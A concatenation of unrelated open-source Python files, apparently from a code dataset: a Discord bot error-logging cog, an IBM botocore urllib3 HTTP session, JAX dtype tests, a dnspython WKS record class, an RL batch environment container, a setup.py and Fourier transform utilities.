embed = discord.Embed(
description=f"Left **{guild.name}**.\n"
f"**{members}** Members",
color=bot_config.GUILD_LEAVE_COLOR
)
embed.set_footer(
text=f"We now have {len(self.bot.guilds)} servers and "
f"{total} users"
)
await log_channel.send(embed=embed)
@commands.Cog.listener()
async def on_error(
self,
event: Any,
*args: list,
**kwargs: dict
) -> None:
owner = self.bot.get_user(bot_config.OWNER_ID)
await owner.send(
f"Error on event {event} with args {args} and \
kwargs {kwargs}\n\n```{traceback.format_exc()}```"
)
@commands.Cog.listener()
async def on_command_error(
self,
ctx: commands.Context,
error: Exception,
force: bool = False
) -> None:
if hasattr(ctx.command, 'on_error') and not force:
return
try:
error = error.original
except Exception:
pass
if type(error) is discord.ext.commands.errors.CommandNotFound:
return
elif type(error) in [
cerrors.BotNeedsPerms, cerrors.DoesNotExist,
cerrors.NoPremiumError, cerrors.AlreadyExists,
cerrors.InvalidArgument, cerrors.NotEnoughCredits
]:
pass
elif type(error) in [
errors.BadArgument, errors.MissingRequiredArgument,
errors.NoPrivateMessage, errors.MissingPermissions,
errors.NotOwner, errors.CommandOnCooldown,
errors.ChannelNotFound, errors.BadUnionArgument,
errors.BotMissingPermissions, errors.UserNotFound,
errors.MemberNotFound, discord.InvalidArgument,
errors.RoleNotFound
]:
pass
elif type(error) is discord.ext.commands.errors.MaxConcurrencyReached:
pass
elif type(error) is ValueError:
pass
elif type(error) is discord.errors.Forbidden:
error = "I don't have the permissions to do that!"
elif type(error) is discord.http.Forbidden:
error = "I don't have the permissions to do that!"
else:
embed = discord.Embed(
title="Hmmm...",
description=(
"Something went wrong while running that command. "
"The error has been reported, and we will fix it "
"as soon as we can."
),
color=bot_config.ERROR_COLOR
)
tb = ''.join(traceback.format_tb(error.__traceback__))
context = (
f"Command: {ctx.command}\nArgs: {ctx.args} "
f"\nKwargs: {ctx.kwargs}"
)
embed.add_field(
name=f"{error.__class__.__name__}",
value=str(error)
)
await ctx.send(embed=embed)
full_strings = (
f"{type(error)}: {error}\n\n"
f"{context}\n\n"
f"```\n{tb}\n```"
).split('\n')
p = commands.Paginator(prefix='', suffix='')
for s in full_strings:
p.add_line(line=s)
for page in p.pages:
await functions.alert_owner(ctx.bot, page)
return
try:
await ctx.send(f"{error}")
except discord.errors.Forbidden:
await ctx.message.author.send(
"I don't have permission to send messages in "
f"{ctx.channel.mention}, so I can't respond "
"to your command!"
)
def setup(
bot: commands.Bot
) -> None:
bot.add_cog(Logging(bot))
|
the-stack_106_15904
|
import os.path
import logging
import socket
from base64 import b64encode
from urllib3 import PoolManager, ProxyManager, proxy_from_url, Timeout
from urllib3.util.retry import Retry
from urllib3.util.ssl_ import (
ssl, OP_NO_SSLv2, OP_NO_SSLv3, OP_NO_COMPRESSION, DEFAULT_CIPHERS,
)
from urllib3.exceptions import SSLError as URLLib3SSLError
from urllib3.exceptions import ReadTimeoutError as URLLib3ReadTimeoutError
from urllib3.exceptions import ConnectTimeoutError as URLLib3ConnectTimeoutError
from urllib3.exceptions import NewConnectionError, ProtocolError, ProxyError
try:
# Always import the original SSLContext, even if it has been patched
from urllib3.contrib.pyopenssl import orig_util_SSLContext as SSLContext
except ImportError:
from urllib3.util.ssl_ import SSLContext
import ibm_botocore.awsrequest
from ibm_botocore.vendored import six
from ibm_botocore.vendored.six.moves.urllib_parse import unquote
from ibm_botocore.compat import filter_ssl_warnings, urlparse
from ibm_botocore.exceptions import (
ConnectionClosedError, EndpointConnectionError, HTTPClientError,
ReadTimeoutError, ProxyConnectionError, ConnectTimeoutError, SSLError
)
filter_ssl_warnings()
logger = logging.getLogger(__name__)
DEFAULT_TIMEOUT = 60
MAX_POOL_CONNECTIONS = 10
DEFAULT_CA_BUNDLE = os.path.join(os.path.dirname(__file__), 'cacert.pem')
try:
from certifi import where
except ImportError:
def where():
return DEFAULT_CA_BUNDLE
def get_cert_path(verify):
if verify is not True:
return verify
return where()
def create_urllib3_context(ssl_version=None, cert_reqs=None,
options=None, ciphers=None):
""" This function is a vendored version of the same function in urllib3
We vendor this function to ensure that the SSL contexts we construct
always use the std lib SSLContext instead of pyopenssl.
"""
context = SSLContext(ssl_version or ssl.PROTOCOL_SSLv23)
# Setting the default here, as we may have no ssl module on import
cert_reqs = ssl.CERT_REQUIRED if cert_reqs is None else cert_reqs
if options is None:
options = 0
# SSLv2 is easily broken and is considered harmful and dangerous
options |= OP_NO_SSLv2
# SSLv3 has several problems and is now dangerous
options |= OP_NO_SSLv3
# Disable compression to prevent CRIME attacks for OpenSSL 1.0+
# (issue urllib3#309)
options |= OP_NO_COMPRESSION
context.options |= options
if getattr(context, 'supports_set_ciphers', True):
# Platform-specific: Python 2.6
context.set_ciphers(ciphers or DEFAULT_CIPHERS)
context.verify_mode = cert_reqs
if getattr(context, 'check_hostname', None) is not None:
# Platform-specific: Python 3.2
# We do our own verification, including fingerprints and alternative
# hostnames. So disable it here
context.check_hostname = False
return context
class ProxyConfiguration(object):
"""Represents a proxy configuration dictionary.
This class represents a proxy configuration dictionary and provides utility
functions to retreive well structured proxy urls and proxy headers from the
proxy configuration dictionary.
"""
def __init__(self, proxies=None):
if proxies is None:
proxies = {}
self._proxies = proxies
def proxy_url_for(self, url):
"""Retrieves the corresponding proxy url for a given url. """
parsed_url = urlparse(url)
proxy = self._proxies.get(parsed_url.scheme)
if proxy:
proxy = self._fix_proxy_url(proxy)
return proxy
def proxy_headers_for(self, proxy_url):
"""Retrieves the corresponding proxy headers for a given proxy url. """
headers = {}
username, password = self._get_auth_from_url(proxy_url)
if username and password:
basic_auth = self._construct_basic_auth(username, password)
headers['Proxy-Authorization'] = basic_auth
return headers
def _fix_proxy_url(self, proxy_url):
if proxy_url.startswith('http:') or proxy_url.startswith('https:'):
return proxy_url
elif proxy_url.startswith('//'):
return 'http:' + proxy_url
else:
return 'http://' + proxy_url
def _construct_basic_auth(self, username, password):
auth_str = '{0}:{1}'.format(username, password)
encoded_str = b64encode(auth_str.encode('ascii')).strip().decode()
return 'Basic {0}'.format(encoded_str)
def _get_auth_from_url(self, url):
parsed_url = urlparse(url)
try:
return unquote(parsed_url.username), unquote(parsed_url.password)
except (AttributeError, TypeError):
return None, None
class URLLib3Session(object):
"""A basic HTTP client that supports connection pooling and proxies.
This class is inspired by requests.adapters.HTTPAdapter, but has been
boiled down to meet the use cases needed by ibm_botocore. For the most part
this classes matches the functionality of HTTPAdapter in requests v2.7.0
(the same as our vendored version). The only major difference of note is
that we currently do not support sending chunked requests. While requests
v2.7.0 implemented this themselves, later version urllib3 support this
directly via a flag to urlopen so enabling it if needed should be trivial.
"""
def __init__(self,
verify=True,
proxies=None,
timeout=None,
max_pool_connections=MAX_POOL_CONNECTIONS,
socket_options=None,
client_cert=None,
):
self._verify = verify
self._proxy_config = ProxyConfiguration(proxies=proxies)
self._pool_classes_by_scheme = {
'http': ibm_botocore.awsrequest.AWSHTTPConnectionPool,
'https': ibm_botocore.awsrequest.AWSHTTPSConnectionPool,
}
if timeout is None:
timeout = DEFAULT_TIMEOUT
if not isinstance(timeout, (int, float)):
timeout = Timeout(connect=timeout[0], read=timeout[1])
self._cert_file = None
self._key_file = None
if isinstance(client_cert, str):
self._cert_file = client_cert
elif isinstance(client_cert, tuple):
self._cert_file, self._key_file = client_cert
self._timeout = timeout
self._max_pool_connections = max_pool_connections
self._socket_options = socket_options
if socket_options is None:
self._socket_options = []
self._proxy_managers = {}
self._manager = PoolManager(**self._get_pool_manager_kwargs())
self._manager.pool_classes_by_scheme = self._pool_classes_by_scheme
def _get_pool_manager_kwargs(self, **extra_kwargs):
pool_manager_kwargs = {
'strict': True,
'timeout': self._timeout,
'maxsize': self._max_pool_connections,
'ssl_context': self._get_ssl_context(),
'socket_options': self._socket_options,
'cert_file': self._cert_file,
'key_file': self._key_file,
}
pool_manager_kwargs.update(**extra_kwargs)
return pool_manager_kwargs
def _get_ssl_context(self):
return create_urllib3_context()
def _get_proxy_manager(self, proxy_url):
if proxy_url not in self._proxy_managers:
proxy_headers = self._proxy_config.proxy_headers_for(proxy_url)
proxy_manager_kwargs = self._get_pool_manager_kwargs(
proxy_headers=proxy_headers)
proxy_manager = proxy_from_url(proxy_url, **proxy_manager_kwargs)
proxy_manager.pool_classes_by_scheme = self._pool_classes_by_scheme
self._proxy_managers[proxy_url] = proxy_manager
return self._proxy_managers[proxy_url]
def _path_url(self, url):
parsed_url = urlparse(url)
path = parsed_url.path
if not path:
path = '/'
if parsed_url.query:
path = path + '?' + parsed_url.query
return path
def _setup_ssl_cert(self, conn, url, verify):
if url.lower().startswith('https') and verify:
conn.cert_reqs = 'CERT_REQUIRED'
conn.ca_certs = get_cert_path(verify)
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
def _get_connection_manager(self, url, proxy_url=None):
if proxy_url:
manager = self._get_proxy_manager(proxy_url)
else:
manager = self._manager
return manager
def _get_request_target(self, url, proxy_url):
if proxy_url and url.startswith('http:'):
# HTTP proxies expect the request_target to be the absolute url to
# know which host to establish a connection to
return url
else:
# otherwise just set the request target to the url path
return self._path_url(url)
def _chunked(self, headers):
return headers.get('Transfer-Encoding', '') == 'chunked'
def send(self, request):
try:
proxy_url = self._proxy_config.proxy_url_for(request.url)
manager = self._get_connection_manager(request.url, proxy_url)
conn = manager.connection_from_url(request.url)
self._setup_ssl_cert(conn, request.url, self._verify)
request_target = self._get_request_target(request.url, proxy_url)
urllib_response = conn.urlopen(
method=request.method,
url=request_target,
body=request.body,
headers=request.headers,
retries=Retry(False),
assert_same_host=False,
preload_content=False,
decode_content=False,
chunked=self._chunked(request.headers),
)
http_response = ibm_botocore.awsrequest.AWSResponse(
request.url,
urllib_response.status,
urllib_response.headers,
urllib_response,
)
if not request.stream_output:
# Cause the raw stream to be exhausted immediately. We do it
# this way instead of using preload_content because
# preload_content will never buffer chunked responses
http_response.content
return http_response
except URLLib3SSLError as e:
raise SSLError(endpoint_url=request.url, error=e)
except (NewConnectionError, socket.gaierror) as e:
raise EndpointConnectionError(endpoint_url=request.url, error=e)
except ProxyError as e:
raise ProxyConnectionError(proxy_url=proxy_url, error=e)
except URLLib3ConnectTimeoutError as e:
raise ConnectTimeoutError(endpoint_url=request.url, error=e)
except URLLib3ReadTimeoutError as e:
raise ReadTimeoutError(endpoint_url=request.url, error=e)
except ProtocolError as e:
raise ConnectionClosedError(
error=e,
request=request,
endpoint_url=request.url
)
except Exception as e:
message = 'Exception received when sending urllib3 HTTP request'
logger.debug(message, exc_info=True)
raise HTTPClientError(error=e)
|
the-stack_106_15905
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import enum
import itertools
import operator
import unittest
from absl.testing import absltest
from absl.testing import parameterized
import numpy as onp
import jax
from jax import dtypes
from jax import numpy as np
from jax import test_util as jtu
from jax.interpreters import xla
from jax.config import config
config.parse_flags_with_absl()
FLAGS = config.FLAGS
bool_dtypes = [onp.dtype('bool')]
signed_dtypes = [onp.dtype('int8'), onp.dtype('int16'), onp.dtype('int32'),
onp.dtype('int64')]
unsigned_dtypes = [onp.dtype('uint8'), onp.dtype('uint16'), onp.dtype('uint32'),
onp.dtype('uint64')]
onp_float_dtypes = [onp.dtype('float16'), onp.dtype('float32'),
onp.dtype('float64')]
float_dtypes = [onp.dtype(dtypes.bfloat16)] + onp_float_dtypes
complex_dtypes = [onp.dtype('complex64'), onp.dtype('complex128')]
all_dtypes = (bool_dtypes + signed_dtypes + unsigned_dtypes + float_dtypes +
complex_dtypes)
scalar_types = [np.bool_, np.int8, np.int16, np.int32, np.int64,
np.uint8, np.uint16, np.uint32, np.uint64,
np.bfloat16, np.float16, np.float32, np.float64,
np.complex64, np.complex128]
class DtypesTest(jtu.JaxTestCase):
@parameterized.named_parameters(
{"testcase_name": "_type={}".format(type.__name__), "type": type,
"dtype": dtype}
for type, dtype in [(bool, np.bool_), (int, np.int_), (float, np.float_),
(complex, np.complex_)])
def testDefaultTypes(self, type, dtype):
for f in [np.array, jax.jit(np.array), jax.jit(lambda x: x)]:
y = f(type(0))
self.assertTrue(isinstance(y, np.ndarray), msg=(f, y))
self.assertEqual(y.dtype, dtypes.canonicalize_dtype(dtype), msg=(f, y))
@parameterized.named_parameters(
{"testcase_name": "_swap={}_jit={}".format(swap, jit),
"swap": swap, "jit": jit}
for swap in [False, True] for jit in [False, True])
@jtu.skip_on_devices("tpu") # F16 not supported on TPU
def testBinaryPromotion(self, swap, jit):
testcases = [
(np.array(1.), 0., np.float_),
(np.array(1.), np.array(0.), np.float_),
(np.array(1.), np.array(0., dtype=np.float16), np.float_),
(np.array(1.), np.array(0., dtype=np.float32), np.float_),
(np.array(1.), np.array(0., dtype=np.float64), np.float64),
(np.array(1., dtype=np.float16), 0., np.float16),
(np.array(1., dtype=np.float32), 0., np.float32),
(np.array(1., dtype=np.float64), 0., np.float64),
(np.array(1., dtype=np.float16), np.array(0., dtype=np.float16), np.float16),
(np.array(1., dtype=np.float16), np.array(0., dtype=np.float32), np.float32),
(np.array(1., dtype=np.float16), np.array(0., dtype=np.float64), np.float64),
(np.array(1., dtype=np.float32), np.array(0., dtype=np.float32), np.float32),
(np.array(1., dtype=np.float32), np.array(0., dtype=np.float64), np.float64),
(np.array(1., dtype=np.float64), np.array(0., dtype=np.float64), np.float64),
(np.array([1.]), 0., np.float_),
(np.array([1.]), np.array(0.), np.float_),
(np.array([1.]), np.array(0., dtype=np.float16), np.float_),
(np.array([1.]), np.array(0., dtype=np.float32), np.float_),
(np.array([1.]), np.array(0., dtype=np.float64), np.float64),
(np.array([1.], dtype=np.float32), np.array(0., dtype=np.float16), np.float32),
(np.array([1.], dtype=np.float16), np.array(0., dtype=np.float32), np.float32),
(np.array([1.], dtype=np.float16), 0., np.float16),
]
op = jax.jit(operator.add) if jit else operator.add
for x, y, dtype in testcases:
x, y = (y, x) if swap else (x, y)
z = x + y
self.assertTrue(isinstance(z, np.ndarray), msg=(x, y, z))
self.assertEqual(z.dtype, dtypes.canonicalize_dtype(dtype), msg=(x, y, z))
def testPromoteDtypes(self):
for t1 in all_dtypes:
self.assertEqual(t1, dtypes.promote_types(t1, t1))
self.assertEqual(t1, dtypes.promote_types(t1, onp.bool_))
self.assertEqual(onp.dtype(onp.complex128),
dtypes.promote_types(t1, onp.complex128))
for t2 in all_dtypes:
# Symmetry
self.assertEqual(dtypes.promote_types(t1, t2),
dtypes.promote_types(t2, t1))
self.assertEqual(onp.dtype(onp.float32),
dtypes.promote_types(onp.float16, dtypes.bfloat16))
# Promotions of non-inexact types against inexact types always prefer
# the inexact types.
for t in float_dtypes + complex_dtypes:
for i in bool_dtypes + signed_dtypes + unsigned_dtypes:
self.assertEqual(t, dtypes.promote_types(t, i))
# Promotions between exact types, or between inexact types, match NumPy.
for groups in [bool_dtypes + signed_dtypes + unsigned_dtypes,
onp_float_dtypes + complex_dtypes]:
for t1, t2 in itertools.combinations(groups, 2):
self.assertEqual(onp.promote_types(t1, t2),
dtypes.promote_types(t1, t2))
def testScalarInstantiation(self):
for t in [np.bool_, np.int32, np.bfloat16, np.float32, np.complex64]:
a = t(1)
self.assertEqual(a.dtype, np.dtype(t))
self.assertIsInstance(a, xla.DeviceArray)
self.assertEqual(0, np.ndim(a))
def testIsSubdtype(self):
for t in scalar_types:
self.assertTrue(dtypes.issubdtype(t, t))
self.assertTrue(dtypes.issubdtype(onp.dtype(t).type, t))
self.assertTrue(dtypes.issubdtype(t, onp.dtype(t).type))
if t != np.bfloat16:
for category in [onp.generic, np.inexact, np.integer, np.signedinteger,
np.unsignedinteger, np.floating, np.complexfloating]:
self.assertEqual(dtypes.issubdtype(t, category),
onp.issubdtype(onp.dtype(t).type, category))
self.assertEqual(dtypes.issubdtype(t, category),
onp.issubdtype(onp.dtype(t).type, category))
def testArrayCasts(self):
for t in [np.bool_, np.int32, np.bfloat16, np.float32, np.complex64]:
a = onp.array([1, 2.5, -3.7])
self.assertEqual(a.astype(t).dtype, np.dtype(t))
self.assertEqual(np.array(a).astype(t).dtype, np.dtype(t))
def testEnumPromotion(self):
class AnEnum(enum.IntEnum):
A = 42
B = 101
onp.testing.assert_equal(onp.array(42), onp.array(AnEnum.A))
onp.testing.assert_equal(np.array(42), np.array(AnEnum.A))
onp.testing.assert_equal(onp.int32(101), onp.int32(AnEnum.B))
onp.testing.assert_equal(np.int32(101), np.int32(AnEnum.B))
if __name__ == "__main__":
absltest.main()
|
the-stack_106_15906
|
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import socket
import struct
import dns.ipv4
import dns.rdata
_proto_tcp = socket.getprotobyname('tcp')
_proto_udp = socket.getprotobyname('udp')
class WKS(dns.rdata.Rdata):
"""WKS record
@ivar address: the address
@type address: string
@ivar protocol: the protocol
@type protocol: int
@ivar bitmap: the bitmap
@type bitmap: string
@see: RFC 1035"""
__slots__ = ['address', 'protocol', 'bitmap']
def __init__(self, rdclass, rdtype, address, protocol, bitmap):
super(WKS, self).__init__(rdclass, rdtype)
self.address = address
self.protocol = protocol
self.bitmap = bitmap
def to_text(self, origin=None, relativize=True, **kw):
bits = []
for i in xrange(0, len(self.bitmap)):
byte = ord(self.bitmap[i])
for j in xrange(0, 8):
if byte & (0x80 >> j):
bits.append(str(i * 8 + j))
text = ' '.join(bits)
return '%s %d %s' % (self.address, self.protocol, text)
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
address = tok.get_string()
protocol = tok.get_string()
if protocol.isdigit():
protocol = int(protocol)
else:
protocol = socket.getprotobyname(protocol)
bitmap = []
while 1:
token = tok.get().unescape()
if token.is_eol_or_eof():
break
if token.value.isdigit():
serv = int(token.value)
else:
if protocol != _proto_udp and protocol != _proto_tcp:
raise NotImplementedError("protocol must be TCP or UDP")
if protocol == _proto_udp:
protocol_text = "udp"
else:
protocol_text = "tcp"
serv = socket.getservbyname(token.value, protocol_text)
i = serv // 8
l = len(bitmap)
if l < i + 1:
for j in xrange(l, i + 1):
bitmap.append('\x00')
bitmap[i] = chr(ord(bitmap[i]) | (0x80 >> (serv % 8)))
bitmap = dns.rdata._truncate_bitmap(bitmap)
return cls(rdclass, rdtype, address, protocol, bitmap)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
file.write(dns.ipv4.inet_aton(self.address))
protocol = struct.pack('!B', self.protocol)
file.write(protocol)
file.write(self.bitmap)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
address = dns.ipv4.inet_ntoa(wire[current : current + 4])
protocol, = struct.unpack('!B', wire[current + 4 : current + 5])
current += 5
rdlen -= 5
bitmap = wire[current : current + rdlen].unwrap()
return cls(rdclass, rdtype, address, protocol, bitmap)
from_wire = classmethod(from_wire)
def _cmp(self, other):
sa = dns.ipv4.inet_aton(self.address)
oa = dns.ipv4.inet_aton(other.address)
v = cmp(sa, oa)
if v == 0:
sp = struct.pack('!B', self.protocol)
op = struct.pack('!B', other.protocol)
v = cmp(sp, op)
if v == 0:
v = cmp(self.bitmap, other.bitmap)
return v
|
the-stack_106_15912
|
"""
Groups a batch_size block of worlds together; can run act, reset etc on entire batch
"""
import torch
import numpy as np
from ulfs import alive_sieve
from ulfs.rl_common import cudarize
class WorldsContainer(object):
"""
Contains a bunch of worlds, runs action tensor against them, and returns
rewards, dead_mask, and next_states tensor
public properties:
- global_rewards C
- states C
- done
- timesteps C
- rewards C
- alive_masks C
('C' means 'cudarized by .cuda()')
"""
def __init__(self, world_constructor, world_constructor_kwargs, batch_size, max_steps):
self.all_worlds = []
self.batch_size = batch_size
self.enable_cuda = False
self.max_steps = max_steps
for n in range(batch_size):
# print('worlds constructor seed', seed)
# if seed is not None:
# world_constructor_kwargs['seed'] = seed + n
world = world_constructor(**world_constructor_kwargs)
self.all_worlds.append(world)
self.type_constr = torch
self.reset(seeds=list(range(self.batch_size)))
def cuda(self):
self.enable_cuda = True
self.type_constr = torch.cuda
return self
def reset(self, seeds):
# print('worlds_container.reset()')
self.worlds = list(self.all_worlds)
self.sieve = alive_sieve.AliveSieve(
batch_size=self.batch_size, enable_cuda=self.enable_cuda)
self.global_timesteps = torch.LongTensor(self.batch_size).fill_(self.max_steps)
self.global_rewards = self.type_constr.FloatTensor(self.batch_size).fill_(0) # full-length, never sieved
# self.timesteps = cudarize(self.timesteps)
if self.enable_cuda:
self.global_timesteps = self.global_timesteps.cuda()
states = torch.zeros(
self.batch_size, *self.worlds[0].state_size)
for b in range(self.batch_size):
states[b] = self.worlds[b].reset(seed=None if seeds is None else seeds[b])
# states = cudarize(states)
# self.global_rewards = cudarize(self.global_rewards)
if self.enable_cuda:
states = states.cuda()
self.global_rewards = self.global_rewards.cuda()
self.t = 0
self.states = states
self.done = False
self.alive_masks = []
return states
def act(self, actions):
"""
actions should be 1-dimensional, can be cuda (we'll cpu it)
"""
actions = actions.cpu()
batch_size = self.sieve.batch_size
rewards = torch.FloatTensor(batch_size).fill_(0)
dead_mask = torch.ByteTensor(batch_size).fill_(0)
states = torch.zeros(batch_size, *self.worlds[0].state_size)
for b in range(batch_size):
_render = False
# if render and sieve.alive_idxes[0] == 0:
# _render = True
# loc = worlds[b].agent_loc
# positions_visited[b][loc[0], loc[1]] = 1
_reward, _done = self.worlds[b].act(actions[b].item(), render=_render)
rewards[b] = _reward
dead_mask[b] = int(_done)
states[b] = self.worlds[b].get_state()
self.sieve.mark_dead(dead_mask)
self.alive_masks.append(self.sieve.alive_mask.clone())
dead_idxes = self.sieve.get_dead_idxes()
if len(dead_idxes) > 0:
self.global_timesteps[self.sieve.global_idxes[dead_idxes]] = self.t + 1
rewards = cudarize(rewards)
dead_mask = cudarize(dead_mask)
states = cudarize(states)
if self.enable_cuda:
rewards = rewards.cuda()
states = states.cuda()
dead_mask = dead_mask.cuda()
self.global_rewards[self.sieve.global_idxes] += rewards
self.rewards = rewards
self.dead_mask = dead_mask
self.states = states
self.done = self.sieve.all_dead()
return rewards, dead_mask, states, self.done
def next_timestep(self):
self.worlds = self.sieve.sieve_list(self.worlds)
self.states = self.sieve.sieve_tensor(self.states)
self.sieve.self_sieve_()
self.rewards = None
self.dead_mask = None
self.t += 1
return self.states
@property
def global_idxes(self):
return self.sieve.global_idxes
@property
def state_size(self):
return self.worlds[0].state_size
@property
def action_space(self):
return self.worlds[0].action_space
def get_int_tensor(self, attribute_name):
values = [getattr(world, attribute_name) for world in self.worlds]
res = torch.IntTensor(values)
return res
def get_full_int_tensor(self, attribute_name):
values = [getattr(world, attribute_name) for world in self.all_worlds]
res = torch.IntTensor(values)
return res
|
the-stack_106_15913
|
# Copyright 2019 MilaGraph. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Zhaocheng Zhu
from __future__ import print_function, absolute_import
import os
from setuptools import setup, find_packages
from graphvite import __version__, lib_path, lib_file
name = "graphvite"
# faiss_file = os.path.join(lib_path, "libfaiss.so")
project_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
# library files
install_path = os.path.join(name, "lib")
data_files = [(install_path, [lib_file])]
# configuration files
for path, dirs, files in os.walk(os.path.join(project_path, "config")):
install_path = os.path.join(name, os.path.relpath(path, project_path))
files = [os.path.join(path, file) for file in files]
data_files.append((install_path, files))
setup(
name=name,
version=__version__,
description="",
packages=find_packages(),
data_files=data_files,
entry_points={"console_scripts": ["graphvite = graphvite.cmd:main"]},
zip_safe=False,
#install_requires=["numpy", "pyyaml", "easydict", "six", "future"],
#extras_requires={"app": ["imageio", "psutil", "scipy", "matplotlib", "torch", "torchvision", "nltk"]}
)
|
the-stack_106_15915
|
import numpy as np
try:
# use scipy if available: it's faster
from scipy.fftpack import fft, ifft, fftshift
except ImportError:
from numpy.fft import fft, ifft, fftshift
def FT_continuous(t, h, axis=-1, method=1):
r"""Approximate a continuous 1D Fourier Transform with sampled data.
This function uses the Fast Fourier Transform to approximate
the continuous fourier transform of a sampled function, using
the convention
.. math::
H(f) = \int h(t) exp(-2 \pi i f t) dt
It returns f and H, which approximate H(f).
Parameters
----------
t : array_like
regularly sampled array of times
t is assumed to be regularly spaced, i.e.
t = t0 + Dt * np.arange(N)
h : array_like
real or complex signal at each time
axis : int
axis along which to perform fourier transform.
This axis must be the same length as t.
Returns
-------
f : ndarray
frequencies of result. Units are the same as 1/t
H : ndarray
Fourier coefficients at each frequency.
"""
assert t.ndim == 1
assert h.shape[axis] == t.shape[0]
N = len(t)
if N % 2 != 0:
raise ValueError("number of samples must be even")
Dt = t[1] - t[0]
Df = 1. / (N * Dt)
t0 = t[N // 2]
f = Df * (np.arange(N) - N // 2)
shape = np.ones(h.ndim, dtype=int)
shape[axis] = N
phase = np.ones(N)
phase[1::2] = -1
phase = phase.reshape(shape)
if method == 1:
H = Dt * fft(h * phase, axis=axis)
else:
H = Dt * fftshift(fft(h, axis=axis), axes=axis)
H *= phase
H *= np.exp(-2j * np.pi * t0 * f.reshape(shape))
H *= np.exp(-1j * np.pi * N / 2)
return f, H
def IFT_continuous(f, H, axis=-1, method=1):
"""Approximate a continuous 1D Inverse Fourier Transform with sampled data.
This function uses the Fast Fourier Transform to approximate
the continuous fourier transform of a sampled function, using
the convention
.. math::
H(f) = integral[ h(t) exp(-2 pi i f t) dt]
h(t) = integral[ H(f) exp(2 pi i f t) dt]
It returns t and h, which approximate h(t).
Parameters
----------
f : array_like
regularly sampled array of times
t is assumed to be regularly spaced, i.e.
f = f0 + Df * np.arange(N)
H : array_like
real or complex signal at each time
axis : int
axis along which to perform fourier transform.
This axis must be the same length as t.
Returns
-------
f : ndarray
frequencies of result. Units are the same as 1/t
H : ndarray
Fourier coefficients at each frequency.
"""
assert f.ndim == 1
assert H.shape[axis] == f.shape[0]
N = len(f)
if N % 2 != 0:
raise ValueError("number of samples must be even")
f0 = f[0]
Df = f[1] - f[0]
t0 = -0.5 / Df
Dt = 1. / (N * Df)
t = t0 + Dt * np.arange(N)
shape = np.ones(H.ndim, dtype=int)
shape[axis] = N
t_calc = t.reshape(shape)
f_calc = f.reshape(shape)
H_prime = H * np.exp(2j * np.pi * t0 * f_calc)
h_prime = ifft(H_prime, axis=axis)
h = N * Df * np.exp(2j * np.pi * f0 * (t_calc - t0)) * h_prime
return t, h
def PSD_continuous(t, h, axis=-1, method=1):
r"""Approximate a continuous 1D Power Spectral Density of sampled data.
This function uses the Fast Fourier Transform to approximate
the continuous fourier transform of a sampled function, using
the convention
.. math::
H(f) = \int h(t) \exp(-2 \pi i f t) dt
It returns f and PSD, which approximate PSD(f) where
.. math::
PSD(f) = |H(f)|^2 + |H(-f)|^2
Parameters
----------
t : array_like
regularly sampled array of times
t is assumed to be regularly spaced, i.e.
t = t0 + Dt * np.arange(N)
h : array_like
real or complex signal at each time
axis : int
axis along which to perform fourier transform.
This axis must be the same length as t.
Returns
-------
f : ndarray
frequencies of result. Units are the same as 1/t
PSD : ndarray
Fourier coefficients at each frequency.
"""
assert t.ndim == 1
assert h.shape[axis] == t.shape[0]
N = len(t)
if N % 2 != 0:
raise ValueError("number of samples must be even")
ax = axis % h.ndim
if method == 1:
# use FT_continuous
f, Hf = FT_continuous(t, h, axis)
Hf = np.rollaxis(Hf, ax)
f = -f[N // 2::-1]
PSD = abs(Hf[N // 2::-1]) ** 2
PSD[:-1] += abs(Hf[N // 2:]) ** 2
PSD = np.rollaxis(PSD, 0, ax + 1)
else:
# A faster way to do it is with fftshift
# take advantage of the fact that phases go away
Dt = t[1] - t[0]
Df = 1. / (N * Dt)
f = Df * np.arange(N // 2 + 1)
Hf = fft(h, axis=axis)
Hf = np.rollaxis(Hf, ax)
PSD = abs(Hf[:N // 2 + 1]) ** 2
PSD[-1] = 0
PSD[1:] += abs(Hf[N // 2:][::-1]) ** 2
PSD[0] *= 2
PSD = Dt ** 2 * np.rollaxis(PSD, 0, ax + 1)
return f, PSD
def sinegauss(t, t0, f0, Q):
"""Sine-gaussian wavelet"""
a = (f0 * 1. / Q) ** 2
return (np.exp(-a * (t - t0) ** 2)
* np.exp(2j * np.pi * f0 * (t - t0)))
def sinegauss_FT(f, t0, f0, Q):
"""Fourier transform of the sine-gaussian wavelet.
This uses the convention
.. math::
H(f) = integral[ h(t) exp(-2pi i f t) dt]
"""
a = (f0 * 1. / Q) ** 2
